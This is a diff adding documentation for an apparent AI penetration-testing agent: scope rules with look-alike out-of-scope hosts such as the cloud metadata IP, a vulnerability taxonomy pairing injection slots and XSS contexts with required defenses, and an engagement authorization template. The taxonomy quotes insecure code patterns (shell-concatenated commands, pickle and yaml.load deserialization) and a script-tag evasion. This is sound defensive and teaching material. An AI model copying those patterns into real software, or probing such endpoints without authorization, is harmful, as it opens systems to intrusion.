+ is auto-OK; destructive payloads need explicit OK.)
69
+
70
+ If any answer is "no" or "not sure," STOP and ask the operator.
71
+
72
+ ## Things That Look In-Scope But Aren't
73
+
74
+ - **Redirects to a parent or sister host.** `staging.example.com` →
75
+ `auth.example.com` is a different host. Stop, re-confirm.
76
+ - **CNAMEs.** `app.staging.example.com` may CNAME to
77
+ `prod-cluster.aws.example.com`. Resolve and check IP, not just name.
78
+ - **Cloud metadata IPs.** `169.254.169.254` is not in any sane
79
+ scope.txt. If your SSRF candidate resolves there, you're probably
80
+ testing against a real cloud host and need explicit approval before
81
+ the probe.
82
+ - **127.0.0.1 / localhost on a shared box.** If you're in a container
83
+ or shared dev box, `localhost` may be someone else's service.
84
+ Confirm with the operator that 127.0.0.1 means what they think.
85
+ - **External services the target depends on.** Stripe API, OAuth
86
+ providers, S3 buckets — even if your tests would touch them, they
87
+ are NOT in scope by default.
88
+
89
+ ## When Scope Fails Open
90
+
91
+ If you can't decide whether a host is in scope:
92
+
93
+ ```
94
+ DEFAULT: out of scope.
95
+ ```
96
+
97
+ Stop the agent. Ask the operator. Resume only after written
98
+ confirmation. There is no penalty for asking; there is significant
99
+ penalty for testing the wrong host.
100
+
101
+ ## Logging
102
+
103
+ Every active request should append to `engagement/request-log.jsonl`:
104
+
105
+ ```json
106
+ {"ts": "2026-05-25T03:14:15Z", "method": "GET", "url": "https://staging.example.com/api/users", "host": "staging.example.com", "in_scope": true, "phase": "recon", "result_status": 200, "evidence_ref": "evidence/recon.md#endpoints"}
107
+ ```
108
+
109
+ This is your audit trail. If anyone ever asks "why did the pentest
110
+ agent hit X?" you can answer from this log.
@@ -0,0 +1,81 @@
1
+ # Vulnerability Taxonomy
2
+
3
+ Two classification systems used during analysis. Both come from Shannon
4
+ (concepts only; rewritten here). Both exist to make the question
5
+ "is this exploitable?" mechanical instead of vibes-based.
6
+
7
+ ## Injection: Slot Types
8
+
9
+ Every injection sink has a **slot type** — the lexical position the
10
+ attacker payload lands in. Each slot type has a small set of
11
+ **required defenses**. A mismatch is a vulnerability. The same defense
12
+ applied to the wrong slot is also a vulnerability.
13
+
14
+ | Slot | Example | Required defense |
15
+ |------|---------|------------------|
16
+ | `SQL-val` | `SELECT * FROM u WHERE id = :v` | Parameterized binding |
17
+ | `SQL-ident` | `SELECT * FROM ${table}` | Allowlist on identifier values |
18
+ | `SQL-keyword` | `ORDER BY ${col} ${dir}` | Allowlist on column AND direction |
19
+ | `CMD-argument` | `subprocess.run(["ls", v])` | argv list (never shell=True) |
20
+ | `CMD-shell` | `os.system("ls " + v)` | DON'T — refactor to argv list |
21
+ | `PATH-segment` | `open("/data/" + v)` | Normalize + allowlist + base-relative check |
22
+ | `URL-host` | redirect to `https://${v}/x` | Allowlist of acceptable hosts |
23
+ | `URL-fetch` | `requests.get(v)` | Allowlist + block private/metadata IPs (SSRF) |
24
+ | `TEMPLATE-string` | `Template("Hello {{ v }}")` | Autoescape ON, no user-controlled template syntax |
25
+ | `DESERIALIZE-pickle` | `pickle.loads(v)` | DON'T — use JSON / msgpack |
26
+ | `DESERIALIZE-yaml` | `yaml.load(v)` | `yaml.safe_load`, never `yaml.load` |
27
+ | `XPATH-expr` | `tree.xpath("//u[@id='" + v + "']")` | Parameterized XPath or escape |
28
+ | `LDAP-filter` | `(uid=${v})` | LDAP filter escaping |
29
+ | `REGEX-pattern` | `re.search(v, text)` | Don't take pattern from user (ReDoS too) |
30
+ | `LOG-record` | `log.info("got " + v)` | Encode CR/LF/control chars before logging |
31
+ | `EMAIL-header` | `Subject: ${v}` | Reject CR/LF |
32
+ | `HTTP-header` | `Set-Cookie: ${v}` | Reject CR/LF (response splitting) |
33
+
34
+ When you classify a finding:
35
+ 1. Identify the slot type
36
+ 2. Identify the actual defense in the code (if you have source)
37
+ 3. If defense doesn't match the required-defense set: vulnerable
38
+
39
+ ## XSS: Render Contexts
40
+
41
+ XSS exploitability depends on **where** in the HTML/JS the value lands.
42
+ Encoding for one context doesn't protect another.
43
+
44
+ | Context | Example | Required encoding |
45
+ |---------|---------|-------------------|
46
+ | `HTML_BODY` | `<div>{{ v }}</div>` | HTML entity encode `<>&"'` |
47
+ | `HTML_ATTR_QUOTED` | `<a href="{{ v }}">` | HTML attr encode |
48
+ | `HTML_ATTR_UNQUOTED` | `<a href={{ v }}>` | Almost impossible to safely encode; quote the attr |
49
+ | `URL_ATTR` (href/src) | `<a href="{{ v }}">` | Validate scheme allowlist + attr encode |
50
+ | `JAVASCRIPT_STRING` | `<script>var x = "{{ v }}";</script>` | JS string escape + ensure quote consistency |
51
+ | `JAVASCRIPT_BLOCK` | `<script>{{ v }}</script>` | DON'T — refactor; no safe encoding |
52
+ | `CSS_VALUE` | `<style>color: {{ v }};</style>` | CSS encode + allowlist scheme/format |
53
+ | `CSS_BLOCK` | `<style>{{ v }}</style>` | DON'T — refactor |
54
+ | `JSON_RESPONSE` (consumed by JS) | `JSON.parse(response)` | JSON encode + correct content-type header |
55
+ | `EVENT_HANDLER` | `<div onclick="{{ v }}">` | JS string escape *inside* HTML attr encode |
56
+ | `URL_PATH` (router-driven) | route param echoed unencoded | URL-encode + HTML-encode |
57
+ | `DOM_INNERHTML` | `el.innerHTML = v` (DOM XSS) | Use `textContent` instead, or DOMPurify |
58
+ | `DOM_DOC_WRITE` | `document.write(v)` | DON'T — refactor |
59
+
60
+ When you classify:
61
+ 1. Identify the render context where user input lands
62
+ 2. Identify the encoding applied
63
+ 3. Mismatch = vulnerable. Even "HTML encoded" output in
64
+ `JAVASCRIPT_STRING` is exploitable (`</script><script>` evasion).
65
+
66
+ ## OWASP Top 10 (2021) Mapping
67
+
68
+ For reporting:
69
+
70
+ | OWASP | Slot/context covered |
71
+ |-------|----------------------|
72
+ | A01 Broken Access Control | authz class (IDOR, vertical/horizontal) |
73
+ | A02 Cryptographic Failures | infra class (weak TLS, plaintext storage) |
74
+ | A03 Injection | injection class (all slot types except deserialize) |
75
+ | A04 Insecure Design | reported in findings narrative |
76
+ | A05 Security Misconfiguration | infra class |
77
+ | A06 Vulnerable Components | infra class (whatweb output) |
78
+ | A07 Auth Failures | auth class |
79
+ | A08 Software/Data Integrity | DESERIALIZE-* slots, also supply chain |
80
+ | A09 Logging/Monitoring | infra class (out of scope for active testing) |
81
+ | A10 SSRF | ssrf class |
@@ -0,0 +1,69 @@
1
+ # Engagement Authorization
2
+
3
+ Fill out before any active testing. Save to `engagement/authorization.md`.
4
+
5
+ ---
6
+
7
+ **Engagement ID:** <UUID or short slug>
8
+ **Operator:** <name of the person driving this session>
9
+ **Date opened:** <ISO 8601 timestamp>
10
+ **Engagement window:** <start ISO timestamp> through <end ISO timestamp>
11
+
12
+ ## Target
13
+
14
+ - Primary URL(s):
15
+ - https://...
16
+ - Primary IP(s):
17
+ - X.X.X.X
18
+ - Hostnames covered:
19
+ - host.example.com
20
+ - api.host.example.com
21
+ - Networks covered (CIDR):
22
+ - 10.0.0.0/24 (internal lab)
23
+
24
+ ## Authorization Basis
25
+
26
+ (Pick one — record evidence in writing for anything but ownership.)
27
+
28
+ - [ ] Operator owns the application and infrastructure being tested.
29
+ - [ ] Written authorization from <name, role, organization, date>.
30
+ Document stored at: <path or link to signed authorization>.
31
+ - [ ]
32
+ as a self-test target. Operator confirms no other user is
33
+ connected to the dashboard instance during the engagement.
34
+
35
+ ## Out of Scope (must not be tested)
36
+
37
+ - Production systems unless explicitly listed above
38
+ - Third-party APIs / SaaS the application calls into
39
+ - Other tenants if the target is multi-tenant
40
+ - Cloud metadata endpoints (169.254.169.254, etc.) unless explicitly
41
+ included above
42
+ - Destructive payloads (DROP, DELETE, file writes outside test
43
+ directories) without per-payload approval
44
+ - Active social engineering, phishing, physical security
45
+
46
+ ## Constraints
47
+
48
+ - Rate limit: <N> req/s per host. Default 5/s (200ms gap).
49
+ - Hours: <none> | <only between HH:MM and HH:MM local>
50
+ - Notify-before for: <list of categories> e.g. "any payload that
51
+ writes data," "any traffic that touches the auth endpoint after
52
+ 10pm local"
53
+
54
+ ## Acknowledgement
55
+
56
+ By approving this engagement, the operator confirms:
57
+
58
+ 1. The targets listed above are authorized for active testing by the
59
+ listed authorization basis.
60
+ 2. Testing may produce HTTP 4xx/5xx responses, log noise, alert
61
+ notifications, and rate-limit triggers in monitoring systems.
62
+ 3. The operator is responsible for any consequences of testing
63
+ targets that are NOT correctly authorized.
64
+ 4. The operator will revoke authorization (by stopping the agent) if
65
+ the scope changes, the time window ends, or any unexpected
66
+ off-scope behavior is observed.
67
+
68
+ **Operator signature (typed name):** ________________
69
+ **Confirmed at:** <ISO 8601 timestamp>